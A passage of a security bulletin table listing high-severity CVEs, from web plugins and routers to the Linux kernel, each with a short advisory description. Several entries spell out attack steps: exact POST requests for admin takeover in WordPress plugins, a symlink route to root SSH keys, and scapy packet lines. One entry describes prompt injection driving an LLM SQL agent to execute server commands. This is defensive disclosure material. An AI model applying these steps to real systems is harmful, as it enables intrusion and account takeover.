| erzhongxmu--JeeWMS | A security flaw has been discovered in erzhongxmu JeeWMS up to 141740afb2ba14d441c82a833d0a418d07ca2d69. This vulnerability affects unknown code of the file /base-boot/jmreport/testConnection of the component JimuReport test-connection Endpoint. Performing a manipulation of the argument dbType/dbDriver/dbUrl/dbUsername/dbPassword results in injection. Remote exploitation of the attack is possible. The exploit has been released to the public and may be used for attacks. This product follows a rolling release approach for continuous delivery, so version details for affected or updated releases are not provided. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-06-07 | 7.3 | CVE-2026-11457 |
| EventPrime--EventPrime | Missing Authorization vulnerability in EventPrime allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects EventPrime: from n/a through 4.3.2.0. | 2026-06-02 | 7.5 | CVE-2026-42669 |
| Fox-themes--Prague | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Fox-themes Prague allows Reflected XSS. This issue affects Prague: from n/a through 2.2.8. | 2026-06-03 | 7.1 | CVE-2025-15654 |
| framework-y--Hybrid Composer | WordPress Hybrid Composer 1.4.6 contains an unauthenticated settings change vulnerability that allows unauthenticated attackers to modify WordPress options by exploiting the hc_ajax_save_option action. Attackers can send POST requests to the admin-ajax.php endpoint with the action parameter set to hc_ajax_save_option to enable user registration and set the default role to administrator, enabling account takeover. | 2026-06-04 | 9.8 | CVE-2019-25738 |
| freedesktop--libinput | In libinput before 1.30.4 and 1.31.x before 1.31.3, libinput-device-group unescaped phys output can inject udev properties leading to arbitrary root code execution | 2026-06-04 | 7.4 | CVE-2026-50292 |
| FreeIPMI--FreeIPMI | ipmi-oem in FreeIPMI before 1.6.18 has exploitable buffer overflows on response messages. The Intelligent Platform Management Interface (IPMI) specification defines a set of interfaces for platform management. It is implemented by a large number of hardware manufacturers to support system management. It is most commonly used for sensor reading (e.g., CPU temperatures through the ipmi-sensors command within FreeIPMI) and remote power control (the ipmipower command). The ipmi-oem client command implements a set of a IPMI OEM commands for specific hardware vendors. If a user has supported hardware, they may wish to use the ipmi-oem command to send a request to a server to retrieve specific information. Two subcommands "ipmi-oem dell get-active-directory-config" and "ipmi-oem fujitsu get-sel-entry-long-text" were found to have exploitable buffer overflows on response messages. | 2026-06-03 | 7.5 | CVE-2026-50031 |
| froxlor--froxlor | Froxlor is open source server administration software. Version 2.3.6 contains a symlink-following flaw in the root-owned SSH key synchronization path used for customer FTP users. The provisioning code appends public keys to `~/.ssh/authorized_keys` under a customer-controlled home directory without verifying that the target path is not a symbolic link. If an attacker controls a shell-enabled customer account and can modify files inside the assigned home directory, the attacker can replace `~/.ssh/authorized_keys` with a symlink to `/root/.ssh/authorized_keys`. When Froxlor's privileged cron task later synchronizes SSH keys, it appends the attacker-supplied key into root's authorized key file, resulting in root SSH access. Version 2.3.7 contains a patch. | 2026-06-04 | 8.8 | CVE-2026-41236 |
| froxlor--froxlor | Froxlor is open source server administration software. Prior to version 2.3.7, the `DomainZones.add` API endpoint does not sanitize newline characters in TXT record content. An authenticated customer with DNS editing enabled can inject newlines into TXT record values, which break out of the record line in the generated BIND zone file. This enables injection of arbitrary BIND directives (`$INCLUDE`, `$GENERATE`) and arbitrary DNS records (A, MX, CNAME) into the zone file written to disk by the DNS rebuild cron. This is an incomplete fix for CVE-2026-30932 (GHSA-x6w6-2xwp-3jh6), which patched the same newline injection for LOC, RP, SSHFP, and TLSA record types but did not patch TXT records. Version 2.3.7 contains an updated patch. | 2026-06-04 | 7.6 | CVE-2026-41234 |
| Genetec Inc.--Genetec Security Center | A high security vulnerability affecting Security Center main server installations has been identified. It could allow an attacker with local OS privileges to the main server to access the Server Admin credentials. A third party hired by Genetec found the issue. There is currently no evidence of active exploitation. This vulnerability is associated with specific installation package builds rather than the product version identifier alone. Certain versions (including 5.10.4.0, 5.11.3.0, 5.12.2.0 and 5.13.3.0) were released with both vulnerable and remediated installation packages under the same version number. Consequently, version-based comparison alone is insufficient to determine exposure. Only installations performed using vulnerable builds are affected. Remediated builds can be distinguished using verified installation package hashes. For the complete list of fixed build hashes, refer to the security advisory section. | 2026-06-02 | 7.8 | CVE-2026-40619 |
| GL.iNet--GL-MT3000 | A vulnerability was detected in GL.iNet GL-MT3000 4.4.5. This affects the function dlopen in the library /usr/lib/oui-httpd/rpc/ of the component Path Normalization Handler. Performing a manipulation of the argument dev_name results in command injection. It is possible to initiate the attack remotely. Upgrading to version 4.7 mitigates this issue. It is advisable to upgrade the affected component. The vendor confirms: " From version 4.7 onward, we have enabled method‑level validation at the HTTP /rpc layer. nas‑web.eject_disk is no longer in the whitelist of allowed methods. Consequently, directly calling eject_disk through the default /rpc endpoint returns Invalid params, preventing entry into subsequent dangerous functions and blocking the remote exploit chain described in the report." | 2026-06-07 | 7.3 | CVE-2026-11450 |
| GL.iNet--GL-MT3000 | A flaw has been found in GL.iNet GL-MT3000 4.4.5. This impacts the function snprintf of the file /cgi-bin/glc of the component FTP Protocol Handler. Executing a manipulation of the argument media_dir can lead to command injection. It is possible to launch the attack remotely. Upgrading to version 4.8.1 will fix this issue. You should upgrade the affected component. The vendor explains: "In version 4.8.1, before writing media_dir to the FTP configuration command, the code escapes single quotes using escape_single_quote(). The payloads in the report-which rely on closing a single quote, appending commands with a semicolon, and commenting out the tail with #-cannot escape execution under the current code path. We also verified this on a GL‑MT3000 device running firmware version 4.8.1 using similar payloads calling the /NAS_API_SET_PROTO_CONFIG interface. Although the interface returned success, the marker file intended to prove command execution was not created; the payload was written into /etc/vsftpd.conf only as ordinary configuration content and did not trigger any shell command execution. Therefore, with the current firmware version and default runtime environment, we could not reproduce the claimed "unauthorized command injection in set_proto_config"." | 2026-06-07 | 7.3 | CVE-2026-11451 |
| GL.iNet--GL-MT3000 | A vulnerability has been found in GL.iNet GL-MT3000 up to 4.4.5. Affected is the function FUN_0042e200 of the file /cgi-bin/glc of the component SET_USER_PWD Handler. The manipulation of the argument Password leads to command injection. The attack can be initiated remotely. Upgrading to version 4.8.1 is able to address this issue. The affected component should be upgraded. The vendor explains: " The current code escapes single quotes in the password parameter and handles it inside a shell single‑quote context. The payloads in the report, which rely on $() or backticks to trigger command substitution, are not executed under the current code path. We tested on a GL‑MT3000 device running firmware 4.8.1 using similar payloads, and no command‑execution marker file was created." | 2026-06-07 | 7.3 | CVE-2026-11452 |
| goauthentik--authentik | authentik is an open-source identity provider. Prior to versions 2025.12.5 and 2026.2.3, due to the implementation of stages in the SFE (Simple Flow Executor) in order to make the interface more compatible with legacy browsers, it was possible to use an XSS exploit in the AutosubmitStage. This issue has been patched in versions 2025.12.5 and 2026.2.3. | 2026-06-02 | 9.3 | CVE-2026-42849 |
| goauthentik--authentik | authentik is an open-source identity provider. Prior to versions 2025.12.6, 2026.2.4, and 2026.5.1, the Source stage can be bypassed by sending an empty POST. This issue has been patched in versions 2025.12.6, 2026.2.4, and 2026.5.1. | 2026-06-02 | 9.8 | CVE-2026-49448 |
| goauthentik--authentik | authentik is an open-source identity provider. Prior to versions 2025.12.5, 2026.2.3, and 2026.5.1, authentik's SAML Source ACS endpoint is vulnerable to XML Signature Wrapping when validating upstream SAML responses. An attacker with any account at the upstream IdP can reuse a valid signed assertion to authenticate as another federated user. This issue has been patched in versions 2025.12.5, 2026.2.3, and 2026.5.1. | 2026-06-02 | 8.5 | CVE-2026-47201 |
| goauthentik--authentik | authentik is an open-source identity provider. Prior to versions 2025.12.6, 2026.2.4, and 2026.5.1, an attacker with the ability to change a source connection, and an account in one of the configured sources can log into any account. This issue has been patched in versions 2025.12.6, 2026.2.4, and 2026.5.1. | 2026-06-02 | 8.8 | CVE-2026-49443 |
| goFrendiAsgard--No-CMS | No-Cms 1.0 contains an SQL injection vulnerability in the order_by parameter of the manage_privilege export endpoint that allows authenticated attackers to manipulate database queries. Attackers can submit POST requests to /nocms/main/manage_privilege/index/export with malicious SQL code in the order_by[0] parameter to extract sensitive database information. | 2026-06-01 | 7.1 | CVE-2018-25431 |
| Graphite project--Graphite | Graphite before 1.3.15 has an integer underflow and resultant out-of-bounds write via Graphite actions, because slotat does not ensure that an offset is within the allowed slot-map range. | 2026-06-05 | 7.3 | CVE-2026-50593 |
| guardrails-ai--guardrails | Guardrails AI is a Python framework that helps build AI applications. On May 11, 2026 at approximately 6:00 PM Pacific, an attacker published a malicious version of `guardrails-ai` (0.10.1) to PyPI. Aany user who installed `guardrails-ai==0.10.1` from PyPI on May 11, 2026 may be affected. Security researchers identified the malicious package within approximately 2 hours of publication, and PyPI quarantined the repository. Based on our telemetry, Guardrails AI maintainers have observed no requests to Guardrails AI infrastructure originating from the malicious 0.10.1 version, and a review of system and access logs has produced no evidence of user data exfiltration through their systems. Users should upgrade to version 0.10.2 or downgrade to version 0.10.0, both of which are unaffected. Those who installed version 0.10.1 should rotate any credentials accessible from their machine (GitHub PATs, cloud provider keys, package registry tokens, API keys) and audit their GitHub account for unauthorized workflows or repositories. | 2026-06-05 | 9.6 | CVE-2026-45758 |
| H3C--Magic B0 | A security vulnerability has been detected in H3C Magic B0 up to 100R002. The affected element is the function SetMobileAPInfoById of the file /goform/aspForm. Such manipulation of the argument param leads to stack-based buffer overflow. The attack may be performed from remote. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-06-01 | 8.8 | CVE-2026-10259 |
| haxtheweb--haxcms-php | HAX CMS helps manage microsite universe with PHP or NodeJs backends. Prior to version 26.0.0 of HAX CMS PHP, the `saveFile` endpoint validates upload extensions case-insensitively and writes the filename to disk verbatim, but the `.htaccess` rule that forces `Content-Disposition: attachment` on HTML files is case-sensitive. An HTML file uploaded with an uppercase extension (`.HTML`, `.Html`, `.HTM`) is still served as `text/html` but the forced-download header never applies, so the browser renders it inline and executes any embedded JavaScript in the HAXcms origin. This bypasses the mitigation shipped for CVE-2026-22704. Version 26.0.0 contains a fix. | 2026-06-05 | 8.7 | CVE-2026-46392 |
| haxtheweb--haxcms-php | HAX CMS helps manage microsite universe with PHP or NodeJs backends. Versions prior to 26.0.1 use `uniqid` for generating salts, which is unsuitable. Version 26.0.1 fixes the issue. | 2026-06-05 | 7.5 | CVE-2026-46493 |
| HCL--Hive | HCL Hive Telco Observability is affected by a Required directives missing from the CSP issue is detected in keycloak component of the web application. Missing essential directives can leave a site vulnerable. | 2026-06-04 | 8.1 | CVE-2025-59874 |
| HCL--iControl | HCL iControl was affected by Export CSV - CSV Injection vulnerability. It is vulnerable to a reflected cross-site scripting vulnerability. This was caused by an insufficient sanitation of input parameters. . | 2026-06-04 | 7.1 | CVE-2025-52612 |
| hippooo--Hippoo Mobile App for WooCommerce | The Hippoo Mobile App for WooCommerce plugin for WordPress is vulnerable to Authentication Bypass leading to Administrator Account Takeover in all versions up to and including 1.9.4. This is due to a logic conflation in HippooPermissions::get_user_permissions(), which returns the same null sentinel for both administrators and unauthenticated visitors - a value that HippooPermissions::has_role_access() unconditionally interprets as full administrator access - causing override_extension_permission_callback() to assign __return_true as the permission callback for every WordPress and WooCommerce REST route cloned under /wc-hippoo/v1/ext/ by HippooControllerWithAuth::re_register_external_routes(), while the block_unauthorized_access() pre-dispatch guard fails to block unauthenticated users for the same reason. This makes it possible for unauthenticated attackers to invoke any core REST endpoint without credentials - most critically, sending a POST request to /wc-hippoo/v1/ext/wp/v2/users/<id> with a {"password":"<new_password>"} body to reset the password of any WordPress user, including the site administrator, and gain full administrative control of the site. | 2026-06-05 | 9.8 | CVE-2026-10580 |
| horizon921--mcpilot | A security flaw has been discovered in horizon921 mcpilot 0.1.0. The impacted element is an unknown function of the file client/src/app/api/mcp/call/route.ts of the component MCP API Call Endpoint. The manipulation of the argument serverBaseUrl results in server-side request forgery. The attack can be launched remotely. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-01 | 7.3 | CVE-2026-10280 |
| IBM--i Access Family | IBM i Access Family 1.1.5.0 through 1.1.9.12 IBM i Access Client Solutions (ACS) is vulnerable to remote code execution when configured to listen for requests from IBM i Navigator. | 2026-06-01 | 8.8 | CVE-2026-7770 |
| IBM--WebSphere Application Server | IBM WebSphere Application Server 9.0, and 8.5 is vulnerable to identity spoofing. | 2026-06-01 | 9.1 | CVE-2026-8644 |
| IBM--WebSphere Application Server | IBM WebSphere Application Server 9.0, and 8.5 is vulnerable to remote code execution caused by the bypass of security controls. | 2026-06-01 | 9 | CVE-2026-9311 |
| IBM--WebSphere Application Server | IBM WebSphere Application Server 9.0, and 8.5 is vulnerable to potential remote code execution due to deserialization of untrusted data via JAX-WS endpoints with WS-Security. | 2026-06-01 | 9 | CVE-2026-9319 |
| IBM--WebSphere Application Server | IBM WebSphere Application Server 9.0, and 8.5 is affected by an improper validation of user-supplied data during deserialization using the SAML Web Single Sign-On component. This could result in remote code execution via a crafted HTTP request when combined with a suitable gadget chain. | 2026-06-01 | 8.5 | CVE-2026-9330 |
| itsourcecode--Online Blood Bank Management System | A vulnerability was identified in itsourcecode Online Blood Bank Management System 1.0. Impacted is an unknown function of the file /admin/viewrequest.php. Such manipulation of the argument ID leads to sql injection. The attack can be executed remotely. The exploit is publicly available and might be used. | 2026-06-01 | 7.3 | CVE-2026-10249 |
| itsourcecode--Online Blood Bank Management System | A security flaw has been discovered in itsourcecode Online Blood Bank Management System 1.0. The affected element is an unknown function of the file /admin/campsdetails.php. Performing a manipulation of the argument hospital results in sql injection. The attack is possible to be carried out remotely. The exploit has been released to the public and may be used for attacks. | 2026-06-01 | 7.3 | CVE-2026-10250 |
| itsourcecode--Online House Rental System | A weakness has been identified in itsourcecode Online House Rental System 1.0. The impacted element is an unknown function of the file /ajax.php?action=login. Executing a manipulation of the argument Username can lead to sql injection. The attack may be performed from remote. The exploit has been made available to the public and could be used for attacks. | 2026-06-01 | 7.3 | CVE-2026-10251 |
| itsourcecode--Online House Rental System | A security vulnerability has been detected in itsourcecode Online House Rental System 1.0. This affects an unknown function of the file /manage_tenant.php. The manipulation of the argument ID leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used. | 2026-06-01 | 7.3 | CVE-2026-10252 |
| itsourcecode--Online House Rental System | A vulnerability was detected in itsourcecode Online House Rental System 1.0. This impacts an unknown function of the file /manage_payment.php. The manipulation of the argument ID results in sql injection. It is possible to launch the attack remotely. The exploit is now public and may be used. | 2026-06-01 | 7.3 | CVE-2026-10253 |
| Ivanti--Neurons for ITSM (On-Premises) | An Improper Access Control vulnerability in Ivanti Neurons for ITSM (cloud and on-premises) allows a remote authenticated attacker to gain administrative access. | 2026-06-01 | 8.8 | CVE-2026-9614 |
| jgwhite33--Google Review Slider | WordPress Plugin Google Review Slider 6.1 contains a time-based blind SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the 'tid' parameter. Attackers can send GET requests to the admin interface with malicious 'tid' values to extract sensitive database information using time-based blind SQL injection techniques. | 2026-06-04 | 8.2 | CVE-2019-25745 |
| jhorowitz--Content Visibility for Divi Builder | The Content Visibility for Divi Builder plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 4.02 via the 'et_pb_text' shortcode 'cvdb_content_visibility_check' parameter. This makes it possible for authenticated attackers, with Contributor-level access and above, to execute code on the server. | 2026-06-02 | 8.8 | CVE-2026-1829 |
| JingDong--JD Cloud Box AX6600 | A security vulnerability has been detected in JingDong JD Cloud Box AX6600 4.5.3.r4546. The impacted element is the function set_macfilter of the file /sbin/jdcweb_rpc. The manipulation leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-06-06 | 8.8 | CVE-2026-11413 |
| Jinher--OA | A security vulnerability has been detected in Jinher OA 1.0. This affects an unknown function of the file nextselectplan.aspx. Such manipulation of the argument httpOID leads to sql injection. The attack may be launched remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-06-06 | 7.3 | CVE-2026-11435 |
| Joomlaextensions--JE Photo Gallery | Joomla Component JE Photo Gallery 1.1 contains an SQL injection vulnerability that allows unauthenticated attackers to extract database information by injecting malicious SQL code through the categoryid parameter. Attackers can send GET requests to index.php with crafted categoryid values in the com_jephotogallery component to execute arbitrary SQL queries and retrieve sensitive data like usernames and password hashes. | 2026-06-01 | 8.2 | CVE-2018-25433 |
| jxxghp--MoviePilot | MoviePilot contains a path traversal vulnerability in the AliPan, U115, and Rclone cloud storage download handlers where the local destination path is constructed by concatenating the configured download directory with a filename taken directly from remote cloud API metadata without basename normalization or path validation. An attacker who controls a filename returned by a remote cloud storage API can include traversal sequences ../ in the filename to cause downloaded content to be written outside the configured download directory, potentially overwriting arbitrary files including configuration or plugin files reachable by the application process. | 2026-06-05 | 8.1 | CVE-2026-11416 |
| kiteworks--Secure Data Forms | Kiteworks is a private data network (PDN). Prior to version 9.3.0, a reflected XSS vulnerability in Kiteworks Secure Data Forms could allow an external attacker to trick a user into executing arbitrary JavaScript code. Upgrade Kiteworks to version 9.3.0 or later to receive a patch. | 2026-06-01 | 8.2 | CVE-2026-24751 |
| kiteworks--Secure Data Forms | Kiteworks is a private data network (PDN). Prior to version 9.3.0, a reflected XSS vulnerability in Kiteworks Secure Data Forms could allow an external attacker to trick a user into executing arbitrary JavaScript code. Upgrade Kiteworks to version 9.3.0 or later to receive a patch. | 2026-06-01 | 8.2 | CVE-2026-24752 |
| kiteworks--Secure Data Forms | Kiteworks is a private data network (PDN). Prior to version 9.3.0,ultiple SQL Injection vulnerabilities in Kiteworks Secure Data Forms could be exploited by an authenticated attacker with the FormBuilder role to retrieve information on or modify other users' form definitions and some global configuration parameters. Upgrade Kiteworks to version 9.3.0 or later to receive a patch. | 2026-06-01 | 7.6 | CVE-2026-24782 |
| Kurt Software Studio--WriteUp Mobile App | Improper Access Control, Missing Authorization vulnerability in Kurt Software Studio WriteUp Mobile App allows Accessing Functionality Not Properly Constrained by ACLs. This issue affects WriteUp Mobile App: from 1.3.0 through 04062026. | 2026-06-04 | 8.8 | CVE-2026-5228 |
| Labf--LabF nfsAxe | LabF nfsAxe 3.7 Ping Client contains a buffer overflow vulnerability that allows local attackers to execute arbitrary code by supplying a malicious payload in the Host IP field. Attackers can craft a specially formatted input file with shellcode and overwrite the return address to execute calc.exe or other arbitrary commands. | 2026-06-04 | 8.4 | CVE-2019-25736 |
| langroid--langroid | Langroid is a framework for building large-language-model-powered applications. Prior to version 0.63.0, SQLChatAgent executes SQL produced by an LLM, which is influenceable by prompt injection. When configured with a database role that has privileges enabling code execution or filesystem access (e.g., PostgreSQL pg_execute_server_program, MySQL FILE, MSSQL xp_cmdshell), an attacker who can shape the agent's input - including indirectly via data returned to the LLM - can coerce execution of dialect-specific primitives such as `COPY ... FROM PROGRAM`, achieving RCE on the database host. Fixed in v0.63.0 by defaulting SQLChatAgent to a SELECT-only sqlglot-parsed statement allowlist with a dialect-aware dangerous-pattern blocklist; allow_dangerous_operations=True restores the previous unrestricted behavior for trusted deployments. | 2026-06-01 | 9.8 | CVE-2026-25879 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netfilter: nft_inner: Fix IPv6 inner_thoff desync In nft_inner_parse_l2l3(), when processing inner IPv6 packets, ipv6_find_hdr() correctly computes the transport header offset traversing all extension headers, but the result is immediately overwritten with nhoff + sizeof(_ip6h) (40 bytes), which only accounts for the IPv6 base header. This creates a desync between inner_thoff (wrong - points to extension header start) and l4proto (correct - e.g., IPPROTO_TCP), enabling transport header forgery and potential firewall bypass. This issue affects stable versions from Linux 6.2. For comparison, the normal (non-inner) IPv6 path correctly preserves ipv6_find_hdr()'s result. Removing the incorrect overwrite ensures that ipv6_find_hdr()'s calculated transport header offset is preserved, thereby fixing the desynchronization. | 2026-06-03 | 9.1 | CVE-2026-46244 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: inet: RAW sockets using IPPROTO_RAW MUST drop incoming ICMP Yizhou Zhao reported that simply having one RAW socket on protocol IPPROTO_RAW (255) was dangerous. socket(AF_INET, SOCK_RAW, 255); A malicious incoming ICMP packet can set the protocol field to 255 and match this socket, leading to FNHE cache changes. inner = IP(src="192.168.2.1", dst="8.8.8.8", proto=255)/Raw("TEST") pkt = IP(src="192.168.1.1", dst="192.168.2.1")/ICMP(type=3, code=4, nexthopmtu=576)/inner "man 7 raw" states: A protocol of IPPROTO_RAW implies enabled IP_HDRINCL and is able to send any IP protocol that is specified in the passed header. Receiving of all IP protocols via IPPROTO_RAW is not possible using raw sockets. Make sure we drop these malicious packets. | 2026-06-03 | 9.1 | CVE-2026-46266 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: fix block_group_tree dirty_list corruption When the incompat flag EXTENT_TREE_V2 is set, we unconditionally add the block group tree to the switch_commits list before calling switch_commit_roots, as we do for the tree root and the chunk root. However, the block group tree uses normal root dirty tracking and in any transaction that does an allocation and dirties a block group, the block group root will already be linked to a list by the dirty_list field and this use of list_add_tail() is invalid and corrupts the prev/next members of block_group_root->dirty_list. This is apparent on a subsequent list_del on the prev if we enable CONFIG_DEBUG_LIST: [32.1571] ------------[ cut here ]------------ [32.1572] list_del corruption. next->prev should beffff958890202538, but was ffff9588992bd538. (next=ffff958890201538) [32.1575] WARNING: lib/list_debug.c:65 at 0x0, CPU#3: sync/607 [32.1583] CPU: 3 UID: 0 PID: 607 Comm: sync Not tainted 6.18.0 #24PREEMPT(none) [32.1585] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS1.17.0-4.fc41 04/01/2014 [32.1587] RIP: 0010:__list_del_entry_valid_or_report+0x108/0x120 [32.1593] RSP: 0018:ffffaa288287fdd0 EFLAGS: 00010202 [32.1594] RAX: 0000000000000001 RBX: ffff95889326e800 RCX:ffff958890201538 [32.1596] RDX: ffff9588992bd538 RSI: ffff958890202538 RDI:ffffffff82a41e00 [32.1597] RBP: ffff958890202538 R08: ffffffff828fc1e8 R09:00000000ffffefff [32.1599] R10: ffffffff8288c200 R11: ffffffff828e4200 R12:ffff958890201538 [32.1601] R13: ffff95889326e958 R14: ffff958895c24000 R15:ffff958890202538 [32.1603] FS: 00007f0c28eb5740(0000) GS:ffff958af2bd2000(0000)knlGS:0000000000000000 [32.1605] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [32.1607] CR2: 00007f0c28e8a3cc CR3: 0000000109942005 CR4:0000000000370ef0 [32.1609] Call Trace: [32.1610] <TASK> [32.1611] switch_commit_roots+0x82/0x1d0 [btrfs] [32.1615] btrfs_commit_transaction+0x968/0x1550 [btrfs] [32.1618] ? btrfs_attach_transaction_barrier+0x23/0x60 [btrfs] [32.1621] __iterate_supers+0xe8/0x190 [32.1622] ? __pfx_sync_fs_one_sb+0x10/0x10 [32.1623] ksys_sync+0x63/0xb0 [32.1624] __do_sys_sync+0xe/0x20 [32.1625] do_syscall_64+0x73/0x450 [32.1626] entry_SYSCALL_64_after_hwframe+0x76/0x7e [32.1627] RIP: 0033:0x7f0c28d05d2b [32.1632] RSP: 002b:00007ffc9d988048 EFLAGS: 00000246 ORIG_RAX:00000000000000a2 [32.1634] RAX: ffffffffffffffda RBX: 00007ffc9d988228 RCX:00007f0c28d05d2b [32.1636] RDX: 00007f0c28e02301 RSI: 00007ffc9d989b21 RDI:00007f0c28dba90d [32.1637] RBP: 0000000000000001 R08: 0000000000000001 R09:0000000000000000 [32.1639] R10: 0000000000000000 R11: 0000000000000246 R12:000055b96572cb80 [32.1641] R13: 000055b96572b19f R14: 00007f0c28dfa434 R15:000055b96572b034 [32.1643] </TASK> [32.1644] irq event stamp: 0 [32.1644] hardirqs last enabled at (0): [<0000000000000000>] 0x0 [32.1646] hardirqs last disabled at (0): [<ffffffff81298817>]copy_process+0xb37/0x2260 [32.1648] softirqs last enabled at (0): [<ffffffff81298817>]copy_process+0xb37/0x2260 [32.1650] softirqs last disabled at (0): [<0000000000000000>] 0x0 [32.1652] ---[ end trace 0000000000000000 ]--- Furthermore, this list corruption eventually (when we happen to add a new block group) results in getting the switch_commits and dirty_cowonly_roots lists mixed up and attempting to call update_root on the tree root which can't be found in the tree root, resulting in a transaction abort: [87.8269] BTRFS critical (device nvme1n1): unable to find root key (1 0 0) in tree 1 [87.8272] ------------[ cut here ]------------ [87.8274] BTRFS: Transaction aborted (error -117) [87.8275] WARNING: fs/btrfs/root-tree.c:153 at 0x0, CPU#4: sync/703 [87.8285] CPU: 4 UID: 0 PID: 703 Comm: sync Not tainted 6.18.0 #25 PREEMPT(none) [87.8287] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.17.0-4.fc41 0 ---truncated--- | 2026-06-03 | 8.4 | CVE-2026-46251 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/xe/pf: Fix sysfs initialization In case of devm_add_action_or_reset() failure the provided cleanup action will be run immediately on the not yet initialized kobject. This may lead to errors like: [ ] kobject: '(null)' (ff110001393608e0): is not initialized, yet kobject_put() is being called. [ ] WARNING: lib/kobject.c:734 at kobject_put+0xd9/0x250, CPU#0: kworker/0:0/9 [ ] RIP: 0010:kobject_put+0xdf/0x250 [ ] Call Trace: [ ] xe_sriov_pf_sysfs_init+0x21/0x100 [xe] [ ] xe_sriov_pf_init_late+0x87/0x2b0 [xe] [ ] xe_sriov_init_late+0x5f/0x2c0 [xe] [ ] xe_device_probe+0x5f2/0xc20 [xe] [ ] xe_pci_probe+0x396/0x610 [xe] [ ] local_pci_probe+0x47/0xb0 [ ] refcount_t: underflow; use-after-free. [ ] WARNING: lib/refcount.c:28 at refcount_warn_saturate+0x68/0xb0, CPU#0: kworker/0:0/9 [ ] RIP: 0010:refcount_warn_saturate+0x68/0xb0 [ ] Call Trace: [ ] kobject_put+0x174/0x250 [ ] xe_sriov_pf_sysfs_init+0x21/0x100 [xe] [ ] xe_sriov_pf_init_late+0x87/0x2b0 [xe] [ ] xe_sriov_init_late+0x5f/0x2c0 [xe] [ ] xe_device_probe+0x5f2/0xc20 [xe] [ ] xe_pci_probe+0x396/0x610 [xe] [ ] local_pci_probe+0x47/0xb0 Fix that by calling kobject_init() and kobject_add() separately and register cleanup action after the kobject is initialized. Also make this cleanup registration a part of the create helper to fix another mistake, as in the loop we were wrongly passing parent kobject while registering cleanup action, and this resulted in some undetected leaks. (cherry picked from commit 98b16727f07e26a5d4de84d88805ce7ffcfdd324) | 2026-06-03 | 8.8 | CVE-2026-46264 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: power: supply: rt9455: Fix use-after-free in power_supply_changed() Using the `devm_` variant for requesting IRQ _before_ the `devm_` variant for allocating/registering the `power_supply` handle, means that the `power_supply` handle will be deallocated/unregistered _before_ the interrupt handler (since `devm_` naturally deallocates in reverse allocation order). This means that during removal, there is a race condition where an interrupt can fire just _after_ the `power_supply` handle has been freed, *but* just _before_ the corresponding unregistration of the IRQ handler has run. This will lead to the IRQ handler calling `power_supply_changed()` with a freed `power_supply` handle. Which usually crashes the system or otherwise silently corrupts the memory... Note that there is a similar situation which can also happen during `probe()`; the possibility of an interrupt firing _before_ registering the `power_supply` handle. This would then lead to the nasty situation of using the `power_supply` handle *uninitialized* in `power_supply_changed()`. Fix this racy use-after-free by making sure the IRQ is requested _after_ the registration of the `power_supply` handle. | 2026-06-03 | 8.4 | CVE-2026-46270 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ibmveth: Disable GSO for packets with small MSS Some physical adapters on Power systems do not support segmentation offload when the MSS is less than 224 bytes. Attempting to send such packets causes the adapter to freeze, stopping all traffic until manually reset. Implement ndo_features_check to disable GSO for packets with small MSS values. The network stack will perform software segmentation instead. The 224-byte minimum matches ibmvnic commit <f10b09ef687f> ("ibmvnic: Enforce stronger sanity checks on GSO packets") which uses the same physical adapters in SEA configurations. The issue occurs specifically when the hardware attempts to perform segmentation (gso_segs > 1) with a small MSS. Single-segment GSO packets (gso_segs == 1) do not trigger the problematic LSO code path and are transmitted normally without segmentation. Add an ndo_features_check callback to disable GSO when MSS < 224 bytes. Also call vlan_features_check() to ensure proper handling of VLAN packets, particularly QinQ (802.1ad) configurations where the hardware parser may not support certain offload features. Validated using iptables to force small MSS values. Without the fix, the adapter freezes. With the fix, packets are segmented in software and transmission succeeds. Comprehensive regression testing completedd (MSS tests, performance, stability). | 2026-06-03 | 8.6 | CVE-2026-46273 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: smb: client: reject userspace cifs.spnego descriptions cifs.spnego key descriptions contain authority-bearing fields such as pid, uid, creduid, and upcall_target that cifs.upcall treats as kernel-originating inputs. However, userspace can also create keys of this type through request_key(2) or add_key(2), allowing those fields to be supplied without CIFS origin. Only accept cifs.spnego descriptions while CIFS is using its private spnego_cred to request the key. | 2026-06-01 | 7.1 | CVE-2026-46243 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: MIPS: Work around LLVM bug when gp is used as global register variable On MIPS, __current_thread_info is defined as global register variable locating in $gp, and is simply assigned with new address during kernel relocation. This however is broken with LLVM, which always restores $gp if it finds $gp is clobbered in any form, including when intentionally through a global register variable. This is against GCC's documentation[1], which requires a callee-saved register used as global register variable not to be restored if it's clobbered. As a result, $gp will continue to point to the unrelocated kernel after the epilog of relocate_kernel(), leading to an early crash in init_idle, [ 0.000000] CPU 0 Unable to handle kernel paging request at virtual address 0000000000000000, epc == ffffffff81afada8, ra == ffffffff81afad90 [ 0.000000] Oops[#1]: [ 0.000000] CPU: 0 UID: 0 PID: 0 Comm: swapper Tainted: G W 6.19.0-rc5-00262-gd3eeb99bbc99-dirty #188 VOLUNTARY [ 0.000000] Tainted: [W]=WARN [ 0.000000] Hardware name: loongson,loongson64v-4core-virtio [ 0.000000] $ 0 : 0000000000000000 0000000000000000 0000000000000001 0000000000000000 [ 